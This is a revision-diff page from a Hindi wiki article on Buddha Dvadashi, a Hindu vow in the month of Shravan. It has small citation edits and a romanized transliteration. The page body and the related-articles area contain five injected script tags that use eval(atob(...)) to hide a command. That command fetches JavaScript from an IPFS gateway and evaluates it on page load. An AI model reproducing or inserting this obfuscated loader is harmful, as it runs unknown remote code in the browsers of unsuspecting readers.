Difference between revisions of "बुद्ध द्वादशी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " {{लेख प्रगति |आधार=आधार1 |प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}" to "")
m (Text replace - ")</ref" to "</ref")
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
 
*[[श्रावण]] [[शुक्ल पक्ष|शुक्ल]] द्वादशी को यह व्रत किया जाता है।  
 
*[[श्रावण]] [[शुक्ल पक्ष|शुक्ल]] द्वादशी को यह व्रत किया जाता है।  
 
*तिथि; गंध आदि से [[बुद्ध]] की स्वर्णिम प्रतिमा का पूजन किया जाता है।
 
*तिथि; गंध आदि से [[बुद्ध]] की स्वर्णिम प्रतिमा का पूजन किया जाता है।
 
*ब्राह्मण को दान किया जाता है।  
 
*ब्राह्मण को दान किया जाता है।  
*शुद्धोदन ने यह व्रत किया था, अतः स्वयं [[विष्णु]] उसे पुत्र के रूप में प्राप्त हुए<ref>कृत्यकल्पतरु (व्रत0 331-332)</ref>; <ref>हेमाद्रि (व्रत0 1, 1037-1038, वराहपुराण से धरणी व्रत के रूप में उद्धृत)।</ref>; <ref>कृत्यरत्नाकर (247-248)</ref>
+
*शुद्धोदन ने यह व्रत किया था, अतः स्वयं [[विष्णु]] उसे पुत्र के रूप में प्राप्त हुए<ref>कृत्यकल्पतरु (व्रत0 331-332</ref>; <ref>हेमाद्रि (व्रत0 1, 1037-1038, वराहपुराण से धरणी व्रत के रूप में उद्धृत)।</ref>; <ref>कृत्यरत्नाकर (247-248</ref>
*बृहत्संहिता<ref>बृहत्संहिता (57|44)</ref> जहाँ बुद्ध प्रतिमा के निर्माण के लिए विधि दी हुई है।  
+
*बृहत्संहिता<ref>बृहत्संहिता (57|44</ref> जहाँ बुद्ध प्रतिमा के निर्माण के लिए विधि दी हुई है।  
  
  
Line 12: Line 12:
  
  
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:54, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • shravan shukl dvadashi ko yah vrat kiya jata hai.
  • tithi; gandh adi se buddh ki svarnim pratima ka poojan kiya jata hai.
  • brahman ko dan kiya jata hai.
  • shuddhodan ne yah vrat kiya tha, atah svayan vishnu use putr ke roop mean prapt hue[1]; [2]; [3]
  • brihatsanhita[4] jahaan buddh pratima ke nirman ke lie vidhi di huee hai.




<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. krityakalpataru (vrat0 331-332
  2. hemadri (vrat0 1, 1037-1038, varahapuran se dharani vrat ke roop mean uddhrit).
  3. krityaratnakar (247-248
  4. brihatsanhita (57|44

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>